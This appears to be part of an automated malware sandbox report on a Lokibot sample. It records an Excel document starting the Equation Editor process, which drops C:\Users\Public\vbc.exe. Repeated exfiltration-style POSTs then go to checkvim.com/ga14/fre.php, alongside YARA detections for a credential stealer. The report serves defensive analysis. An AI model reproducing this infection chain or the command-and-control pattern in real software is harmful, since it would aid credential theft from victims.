                    Date: Tue, 28 Sep 2021 04:51:26 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    66 | 192.168.2.22 | 49231 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:15.726731062 CEST | 310 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:16.076317072 CEST | 311 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:27 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    67 | 192.168.2.22 | 49232 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:16.340414047 CEST | 311 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:16.690124035 CEST | 312 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:28 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    68 | 192.168.2.22 | 49233 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:16.959594965 CEST | 313 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:17.307420969 CEST | 313 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:28 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    69 | 192.168.2.22 | 49234 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:17.590102911 CEST | 314 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:17.941711903 CEST | 315 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:29 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    7 | 192.168.2.22 | 49172 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:36.981513977 CEST | 228 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:37.329349995 CEST | 229 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:48 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    70 | 192.168.2.22 | 49235 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:18.196433067 CEST | 316 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:18.572170973 CEST | 316 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:29 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    71 | 192.168.2.22 | 49236 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:18.836328983 CEST | 317 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:19.181425095 CEST | 317 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:30 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    72 | 192.168.2.22 | 49237 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    73 | 192.168.2.22 | 49238 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    74 | 192.168.2.22 | 49239 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    75 | 192.168.2.22 | 49240 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    76 | 192.168.2.22 | 49241 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    77 | 192.168.2.22 | 49242 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    78 | 192.168.2.22 | 49243 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    79 | 192.168.2.22 | 49244 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    8 | 192.168.2.22 | 49173 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:37.611742973 CEST | 230 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:37.968482971 CEST | 230 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:49 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    80 | 192.168.2.22 | 49245 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    81 | 192.168.2.22 | 49246 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    82 | 192.168.2.22 | 49247 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    83 | 192.168.2.22 | 49248 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    84 | 192.168.2.22 | 49249 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    85 | 192.168.2.22 | 49250 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    86 | 192.168.2.22 | 49251 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    87 | 192.168.2.22 | 49252 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    88 | 192.168.2.22 | 49253 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    89 | 192.168.2.22 | 49254 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    9 | 192.168.2.22 | 49174 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:38.271241903 CEST | 231 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:38.657721996 CEST | 232 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:49 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    90 | 192.168.2.22 | 49255 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    91 | 192.168.2.22 | 49256 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    92 | 192.168.2.22 | 49257 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    93 | 192.168.2.22 | 49258 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    94 | 192.168.2.22 | 49259 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    95 | 192.168.2.22 | 49260 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    96 | 192.168.2.22 | 49261 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    97 | 192.168.2.22 | 49262 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    98 | 192.168.2.22 | 49263 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    99 | 192.168.2.22 | 49264 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Code Manipulations

                    Statistics

                    Behavior

                    System Behavior

                    General

                    Start time:06:50:14
                    Start date:28/09/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                    Imagebase:0x13f0f0000
                    File size:28253536 bytes
                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    General

                    Start time:06:50:35
                    Start date:28/09/2021
                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Wow64 process (32bit):true
                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                    Imagebase:0x400000
                    File size:543304 bytes
                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:06:50:38
                    Start date:28/09/2021
                    Path:C:\Users\Public\vbc.exe
                    Wow64 process (32bit):true
                    Commandline:'C:\Users\Public\vbc.exe'
                    Imagebase:0x400000
                    File size:210432 bytes
                    MD5 hash:59A67B5CCF01B6A564265797DC5E53E8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Disassembly

                    Code Analysis
